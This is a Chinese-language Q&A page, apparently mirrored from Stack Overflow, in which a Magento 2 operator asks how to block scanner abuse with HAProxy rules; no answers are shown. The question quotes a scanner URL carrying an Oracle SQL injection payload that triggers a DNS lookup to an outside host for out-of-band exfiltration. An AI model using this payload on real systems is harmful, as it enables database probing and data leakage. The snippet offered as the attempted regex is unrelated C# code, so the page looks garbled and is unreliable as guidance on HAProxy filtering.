先进的滥用检测

时间:2019-03-19 14:02:31

标签: haproxy

在Magento2安装中,我们面临着一些netsparker扫描和其他与滥用相关的事情。我们已经使用粘性表实现了速率限制。

下一步,我们要拒绝特定的网址。

一个例子

  

https://www.exampledomain.com/category/page.html?hTTp%3A%2F%2Fr87_com%2Fn=&attribute=(select%20UTL_INADDR.GET_HOST_ADDRESS(%27i-bwzqt8sjg7sqtf9ygenxljxxmu2ad0itrghi_9%27%7c%7c%27k34.r87.me%27)%20from%20DUAL)

我们尝试设置一些正则表达式,例如

var collection = textBox.ItemsSource as IEnumerable<string>;
if (collection != null)
{
    //...
} 

这会导致应用程序前端错误。

我们如何更有效地处理这个问题?

0 个答案:

没有答案